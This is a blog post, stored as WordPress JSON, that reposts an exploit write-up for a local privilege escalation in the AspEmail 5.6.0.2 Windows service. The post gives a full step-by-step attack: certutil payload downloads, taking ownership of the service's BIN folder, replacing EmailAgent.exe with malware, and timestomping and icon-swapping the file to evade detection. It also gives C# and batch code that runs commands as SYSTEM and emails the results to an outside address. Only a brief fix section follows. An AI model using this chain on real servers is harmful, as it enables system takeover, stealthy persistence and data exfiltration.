{"id":40510,"date":"2023-04-18T23:21:55","date_gmt":"2023-04-18T19:21:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171905\/aspemail5602-escalate.txt"},"modified":"2023-04-21T21:56:00","modified_gmt":"2023-04-21T17:26:00","slug":"aspemail-5-6-0-2-weak-permissions-local-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aspemail-5-6-0-2-weak-permissions-local-privilege-escalation\/","title":{"rendered":"AspEmail 5.6.0.2 Weak Permissions \/ Local Privilege Escalation"},"content":{"rendered":"

####################################################################################################################
\n# Exploit Title: AspEmail 5.6.0.2 – Local Privilege Escalation #
\n# Vulnerability Category: [Weak Services Permission – Binary Permission Vulnerability] #
\n# Date: 13\/04\/2023 #
\n# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
\n# Vendor Homepage: https:\/\/www.aspemail.com #
\n# Software Link: https:\/\/www.aspemail.com\/download.html #
\n# Product: AspEmail #
\n# Version: AspEmail 5.6.0.2 and all #
\n# Platform – Architecture : Windows – 32-bit | 64-bit | Any CPU #
\n# Tested on: Windows Server 2016 and Windows Server 2019 #
\n# CVE : 0DAY #
\n####################################################################################################################<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\PenTest>whoami \/priv<\/p>\n

PRIVILEGES INFORMATION
\n———————-<\/p>\n

Privilege Name Description State
\n============================= ========================================= ========
\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
\nSeChangeNotifyPrivilege Bypass traverse checking Enabled
\nSeImpersonatePrivilege Impersonate a client after authentication Enabled
\nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled<\/p>\n

# ==================================================================================================================<\/p>\n

* First, we will test whether the AspEmail service is active.
\n* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:<\/p>\n

[+] C:\\PenTest>tasklist \/svc | findstr EmailAgent.exe
\nEmailAgent.exe 4400 Persits Software EmailAgent<\/p>\n

or<\/p>\n

[+] C:\\PenTest>tasklist \/svc | findstr EmailAgent64.exe
\nEmailAgent64.exe 4400 Persits Software EmailAgent<\/p>\n

* We have detected that the process of the “Persits Software Email Agent” Service is state “RUNNING”.
\n* Now we know that AspEmail service is active.<\/p>\n

# ==================================================================================================================<\/p>\n

* We will need these:<\/p>\n

[+] C:\\PenTest>certutil -urlcache -split -f http:\/\/10.1.11.21\/EmailAgent.exe “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN\\EmailAgentPrivESC.exe” <<<=== MyExploit
\n[+] C:\\PenTest>certutil -urlcache -split -f http:\/\/10.1.11.21\/nircmd.exe “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN\\nircmd.exe”
\n[+] C:\\PenTest>certutil -urlcache -split -f http:\/\/10.1.11.21\/Mail.exe “C:\\Windows\\Temp\\Mail.exe”
\n[+] C:\\PenTest>certutil -urlcache -split -f http:\/\/10.1.11.21\/Run.exe “C:\\Windows\\Temp\\Run.bat”
\n[+] C:\\PenTest>certutil -urlcache -split -f http:\/\/10.1.11.21\/PrivescCheck.ps1 “C:\\PenTest\\PrivescCheck.ps1”<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\PenTest>powershell -ep bypass -c “. .\\PrivescCheck.ps1; Invoke-PrivescCheck”<\/p>\n

Name: Persits Software EmailAgent
\nImagePath : “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN\\Email
\nAgent.exe” \/run
\nUser : LocalSystem
\nModifiablePath : C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN
\nIdentityReference : Everyone
\nPermissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData\/ListDirectory,
\nAppendData\/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData\/AddFile,
\nReadExtendedAttributes, DeleteChild, Execute\/Traverse
\nStatus : Unknown
\nUserCanStart : False
\nUserCanStop : False<\/p>\n

[+] C:\\PenTest>del PrivescCheck.ps1<\/p>\n

* We detected “Persits Software EmailAgent” Service “Binary Permission Vulnerability” in our checks.<\/p>\n

# ================================================================================================================== #<\/p>\n

[+] C:\\PenTest>ICACLS “C:\\Program Files (x86)\\Persits Software\\AspEmail”<\/p>\n

Successfully processed 0 files; Failed processing 1 files
\nC:\\Program Files (x86)\\Persits Software\\AspEmail: Access is denied.<\/p>\n

* We do not have permission to access subdirectories.<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\PenTest>ICACLS “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN”<\/p>\n

C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN Everyone:(OI)(CI)(F)
\nDeepSecLab\\psacln:(I)(OI)(CI)(N)
\nDeepSecLab\\psaadm:(I)(OI)(CI)(N)
\nDeepSecLab\\psaadm_users:(I)(OI)(CI)(N)
\nBUILTIN\\Administrators:(I)(F)
\nCREATOR OWNER:(I)(OI)(CI)(IO)(F)
\nAPPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
\nNT SERVICE\\TrustedInstaller:(I)(CI)(F)
\nNT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
\nBUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)
\nBUILTIN\\Users:(I)(OI)(CI)(RX)
\nAPPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)<\/p>\n

* Unlike other directories, we have full privileges in the “BIN” directory of the service.
\n* This is chmod 0777 – rwxrwxrwx in linux language.<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path=”C:\\\\Program Files (x86)\\\\Persits Software\\\\AspEmail\\\\Bin\\\\EmailAgent.exe” ASSOC \/RESULTROLE:Owner \/ASSOCCLASS:Win32_LogicalFileOwner \/RESULTCLASS:Win32_SID<\/p>\n

__PATH<\/p>\n

\\\\DeepSecLab\\root\\cimv2:Win32_LogicalFileSecuritySetting.Path=”C:\\\\Program Files (x86)\\\\Persits Software\\\\AspEmail\\\\Bin\\\\EmailAgent.exe”<\/p>\n

\\\\DeepSecLab\\root\\cimv2:Win32_SID.SID=”S-1-5-32-544″
\nroot\\cimv2 DeepSecLab {} 5 Win32_SID.SID=”S-1-5-32-544″ Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
\n[EmailAgent.exe] ===>>> Owner: BUILTIN\\Administrators<\/p>\n

* We understood “EmailAgent.exe” processor was installed by the Administrator and the owner is the Administrator user.<\/p>\n

# ==================================================================================================================<\/p>\n

* Now we will take ownership of this directory as we will execute our operations under the “BIN” directory.<\/p>\n

[+] C:\\PenTest>whoami
\nDeepSecLab\\Hacker<\/p>\n

[+] C:\\PenTest>takeown \/f “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN”
\nSUCCESS: The file (or folder): “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN” now owned by user “DeepSecLab\\Hacker”.<\/p>\n

[+] C:\\PenTest>ICACLS “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN” \/Grant DeepSecLab\\Hacker:F<\/p>\n

processed file: C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN
\nSuccessfully processed 1 files; Failed processing 0 files<\/p>\n

* Ok. All commands resulted successfully. We now have full privileges for this directory.<\/p>\n

# ==================================================================================================================<\/p>\n

* Now we will modify the EmailAgent file and inject a self-written malware.
\n* We will be careful not to damage any files while doing this so that all transactions can be easily undone.<\/p>\n

[+] C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN>ren EmailAgent.exe Null.EmailAgent.exe
\n[+] C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin>dir
\nVolume in drive C has no label.
\nVolume Serial Number is 0C8A-5291<\/p>\n

Directory of C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin<\/p>\n

14.04.2023 16:47 <DIR> .
\n14.04.2023 16:47 <DIR> ..
\n01.03.2004 15:55 143.360 AspEmail.dll
\n25.02.2004 16:23 188.416 AspUpload.dll
\n13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
\n24.09.2003 09:22 139.264 EmailAgentCfg.cpl
\n24.09.2003 09:25 94.208 EmailLogger.dll
\n24.09.2003 09:21 167.936 Null.EmailAgent.exe
\n6 File(s) 745.472 bytes
\n2 Dir(s) 165.936.717.824 bytes free<\/p>\n

# ==================================================================================================================<\/p>\n

* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.<\/p>\n

[+] C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN>nircmd.exe setfiletime “EmailAgent.exe” “24.03.2007 09:21:30” “24.03.2007 09:21:30” “23.05.2017 06:42:28”
\n[+] C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN>del nircmd.exe<\/p>\n

* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
\n* I used the Resource Tuner Console tool.
\n>>> http:\/\/www.restuner.com\/tour-resource-tuner-console.htm
\n* This can be done easily with the Resource Tuner tool.
\n>>> http:\/\/www.resource-editor.com\/how-to-change-icons-in-exe.html
\n>>> http:\/\/www.restuner.com\/download.htm<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin>dir
\nVolume in drive C has no label.
\nVolume Serial Number is 0C8A-5291<\/p>\n

Directory of C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin<\/p>\n

14.04.2023 16:47 <DIR> .
\n14.04.2023 16:47 <DIR> ..
\n01.03.2004 15:55 143.360 AspEmail.dll
\n25.02.2004 16:23 188.416 AspUpload.dll
\n24.09.2003 09:21 12.288 EmailAgent.exe
\n24.09.2003 09:22 139.264 EmailAgentCfg.cpl
\n24.09.2003 09:25 94.208 EmailLogger.dll
\n24.09.2003 09:21 167.936 Null.EmailAgent.exe
\n6 File(s) 745.472 bytes
\n2 Dir(s) 165.936.717.824 bytes free<\/p>\n

[24.09.2003 09:21] 12.288 EmailAgent.exe
\n[24.09.2003 09:21] 167.936 Null.EmailAgent.exe<\/p>\n

* And time manipulation is over. They look like they were uploaded at the same time long ago.<\/p>\n

# ==================================================================================================================<\/p>\n

* Now we check for my malware ownership.<\/p>\n

[+] C:\\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path=”C:\\\\Program Files (x86)\\\\Persits Software\\\\AspEmail\\\\Bin\\\\EmailAgent.exe” ASSOC \/RESULTROLE:Owner \/ASSOCCLASS:Win32_LogicalFileOwner \/RESULTCLASS:Win32_SID<\/p>\n

__PATH<\/p>\n

\\\\DeepSecLab\\root\\cimv2:Win32_LogicalFileSecuritySetting.Path=”C:\\\\Program Files (x86)\\\\Persits Software\\\\AspEmail\\\\Bin\\\\EmailAgent.exe”<\/p>\n

\\\\DeepSecLab\\root\\cimv2:Win32_SID.SID=”S-1-5-21-3674093405-176013069-2091862131-1511″ root\\cimv2 DeepSecLab {} 5 Win32_SID.SID=”S-1-5-21-3674093405-176013069-2091862131-1511″ Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28<\/p>\n

[+] C:\\PenTest>WMIC UserAccount WHERE sid=”S-1-5-21-3674093405-176013069-2091862131-1511″ GET Name<\/p>\n

Name<\/p>\n

DeepSecLab\\Hacker<\/p>\n

EmailAgent.exe Owner: DeepSecLab\\Hacker<\/p>\n

# =================================================================================================================#
\n# #
\n####################################################################################################################
\n# #[EmailAgent.cs]# #
\n####################################################################################################################
\n# #
\n#
\n* We program this malware in such a way that when the server is reboot(when the services are restarted), #
\n* It will be triggered and execute the codes we want, #
\n* And then send a printout of all this to the email address we specified. #
\n#
\nusing System; #
\nusing System.Linq; #
\nusing System.Text; #
\nusing System.Diagnostics; #
\nusing System.IO; #
\nusing System.Collections; #
\n#
\nNamespace CliToolSpace #
\n{ #
\nclass _Main #
\n{ #
\nstatic void Main(string[] args) #
\n{ #
\nCli commandLine = new Cli(); #
\ncommandLine.FileToCli(@”C:\\Windows\\Temp\\Mail.exe & C:\\Windows\\Temp\\Run.bat”); #
\ncommandLine.Execute(); #
\ncommandLine.ToFile(@”C:\\Windows\\Temp\\”); #
\n} #
\n} #
\n} #
\n#
\n# #
\n####################################################################################################################
\n# #[Mail.cs]# #
\n####################################################################################################################
\n# #
\n#
\nusing System; #
\nusing System.Net.Mail; #
\nusing System.Net; #
\nSmtpClient SmtpServer = new SmtpClient(“smtp.deepseclab.com”); #
\nvar mail = new MailMessage(); #
\nmail.From = new MailAddress(“mail@deepseclab.com”); #
\nmail.To.Add(“mail@hacker.com”); #
\nmail.Subject = “Trigger Successful!”; #
\nmail.IsBodyHtml = true; #
\nstring htmlBody; #
\nhtmlBody = “<strong>This server has been rebooted.<\/strong>”; #
\nmail.Body = htmlBody; #
\nAttachment attachment; #
\nattachment = new Attachment(@”C:\\Windows\\Temp\\Export.txt”); #
\nmail.Attachments.Add(attachment); #
\nSmtpServer.Port = 587; #
\nSmtpServer.UseDefaultCredentials = false; #
\nSmtpServer.Credentials = new System.Net.NetworkCredential(“mail@deepseclab.com”,”p@ssw0rd123″); #
\nSmtpServer.EnableSsl = true; #
\nSmtpServer.Timeout = int.MaxValue; #
\nSmtpServer.Send(mail); #
\n#
\n# #
\n####################################################################################################################
\n# #[Run.bat]# #
\n####################################################################################################################
\n# #
\n#
\nwhoami > C:\\Windows\\Temp\\Export.txt #
\ncd C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin #
\ndel EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
\ncd c:\\Windows\\Tasks #
\ndel Run.bat & del Mail.exe #
\n#
\n# #
\n####################################################################################################################
\n# #
\n[+]Trigger Successful![+] #
\n#
\n[+] C:\\PenTest>systeminfo | findstr “Boot Time” #
\nSystem Boot Time: 13.04.2022, 07:46:06 #
\n#
\n# #
\n####################################################################################################################
\n#[Export.txt]# #
\n####################################################################################################################
\n# #
\n#
\nNT AUTHORITY\\SYSTEM #
\n#
\n# #
\n####################################################################################################################
\n# #
\n# ==================================================================================================================
\n# …|||[FIX]|||… #
\n# ==================================================================================================================
\n# [+] C:\\>Runas \/profile \/user:DeepSecLab\\Administrator CMD [+] #
\n# =================================================================================================================#<\/p>\n

[+] C:\\Administrator>sc qc “Persits Software EmailAgent”
\n[SC] QueryServiceConfig SUCCESS<\/p>\n

SERVICE_Name: Persits Software EmailAgent
\nTYPE : 10 WIN32_OWN_PROCESS
\nSTART_TYPE : 2 AUTO_START
\nERROR_CONTROL : 1 NORMAL
\nBINARY_PATH_Name : “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN\\EmailAgent.exe” \/run
\nLOAD_ORDER_GROUP :
\nTAG : 0
\nDISPLAY_Name : Persits Software EmailAgent
\nDEPENDENCIES : rpcss
\nSERVICE_START_Name : LocalSystem<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\Administrator>sc sdshow “Persits Software EmailAgent”<\/p>\n

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\Administrator>accesschk64.exe -wuvc “Persits Software EmailAgent” -accepteula<\/p>\n

Accesschk v6.15 – Reports effective permissions for securable objects
\nCopyright (C) 2006-2022 Mark Russinovich
\nSysinternals – www.sysinternals.com<\/p>\n

Persits Software EmailAgent
\nMedium Mandatory Level (Default) [No-Write-Up]\nRW NT AUTHORITY\\SYSTEM
\nSERVICE_ALL_ACCESS
\nRW BUILTIN\\Administrators
\nSERVICE_ALL_ACCESS<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\Administrator>ICACLS “C:\\Program Files (x86)\\Persits Software” \/T \/Q \/C \/RESET<\/p>\n

[+] C:\\PenTest>ICACLS “C:\\Program Files (x86)\\Persits Software\\AspEmail\\BIN”<\/p>\n

Successfully processed 0 files; Failed processing 1 files
\nC:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin: Access is denied.<\/p>\n

DONE!<\/p>\n

# ==================================================================================================================<\/p>\n

[+] C:\\Administrator>sc stop “Persits Software EmailAgent”<\/p>\n

[+] PS C:\\Administrator> Start-Service -Name “Persits Software EmailAgent”<\/p>\n

* These commands are optional. Used to stop the “Persits Software EmailAgent” service. We fixed the vulnerability and I don’t think it’s necessary anymore.<\/p>\n

# ==================================================================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"

#################################################################################################################### # Exploit Title: AspEmail 5.6.0.2 – Local Privilege Escalation # # Vulnerability Category: [Weak Services Permission – Binary Permission Vulnerability] # # Date: 13\/04\/2023 # # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # # Vendor Homepage: https:\/\/www.aspemail.com # # Software Link: https:\/\/www.aspemail.com\/download.html # # Product: AspEmail # # Version: AspEmail 5.6.0.2 and all # # Platform …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40510","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40510","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40510"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40510\/revisions"}],"predecessor-version":[{"id":40613,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40510\/revisions\/40613"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40510"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40510"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40510"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}